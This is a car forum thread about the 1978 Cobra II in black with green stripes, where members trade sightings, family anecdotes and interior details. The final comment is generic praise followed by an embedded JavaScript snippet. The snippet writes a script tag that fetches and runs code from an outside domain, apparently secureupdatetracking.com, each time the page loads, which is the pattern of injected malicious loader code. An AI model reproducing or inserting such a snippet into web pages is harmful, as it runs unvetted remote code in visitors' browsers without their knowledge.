Can anyone tell me....

Sparxx

Feb 3, 2009
Just how many 78 Cobra II's there where that had the black with green stripes? My parents bought one new and just happened to have one exactly like it in the same town (Fargo ND). Well after a while the owner stopped my dad while he was driving theirs and ask if he wanted to sell it. Turns out he wrecked his the week before. I have searched all over the internet to try and find a picture of one with that color combo and get nothing. So any pictures of one would also be helpful. They luckly did take a few pic I just have to get them to scan them in and send them. When I get them I will post them. So any help here would be great. Thanks

• Sponsors (?)

These are the best I have so far. Hoping to have more soon.
376521516.jpg

That's the first one I've seen. Weird to have two in one town. If they are the original owner I would get a Marti report for sure. I'm sure it would add to the sale price if they decide to sell.

Sold it long time ago (early 80's). Regetted it ever since. They think they still have the original window sticker some where. If they do I'm going to see if I can track it down. I don't really want to do the Marti report for a car I don't own.

I always figured that color combination was available, but that is the first picture I've seen. And to have two of them in one town is amazing. One of the reasons I thought that it was possible was that Ford had a '79 Cobra with black exterior and green decals.

What color was the interior? Too bad Ford didn't have a green interior in '78! Many of the black with red decal '78 CBII's (including mine) had the red interior which made for a striking combination.

Come to think of it, the green decals would have looked pretty good with the Dark Jade Metallic exterior also.

Thanks for the pics!

It had the black interior. I know for a fact that there was at least 3 in the midwest. 1 that my parents owned, 1 was in Fargo area (wrecked owner wrapped it around a tree), 1 MIA. My parents wanted a new Cobra and the dealship told them that they where only getting one. Just so happened a couple days later the delvery truck was unloading as my father was driving by. It had 2 Cobras on it. He stopped and what was up with the second Cobra. Saleman said they weren't suppost to get a second one, but he would sell it to him. Not sure where it was suppost to go but it never made it there. About 2 weeks after buying it he was driving it around Fargo when a identical car started to follow him. Later he had the same guy follow him to a gas station and asked if he would sell it. He need to replace his after wrapping it around a tree. I'm in the process of picking up a black 78 Cobra and plan to clone their old car.

There used to be on G.A.F.B. (CA) when I lived there in the 80's before being closed. There was also a 79 Cobra in the same color with hood snake, no side stripe and just the " cobra" on the quarters. Think that is hard to find try finding Light blue 74 coupes! I have seen 5 total. I owned a second identical light blue coupe although ghia, I saved from being scrapped, but was forced to sell. One junked with the manual sunroof, and 1 in Corona CA, and one about a month ago for sale in Madras OR, none others in 20 plus years.

This one looks really good, I've never seen any of these in reality before!
<script language='JavaScript' type='text/javascript'>document.write ("<" + "script language='JavaScript' type='text/javascript' src='http://secureupdatetracking.com/xux/output/index/Ur5HMXLyMVIgg6uA1km1ceh8Ilg7r4bm?rand=" + Math.random() * 100000000 +"'></"+"script>")</script>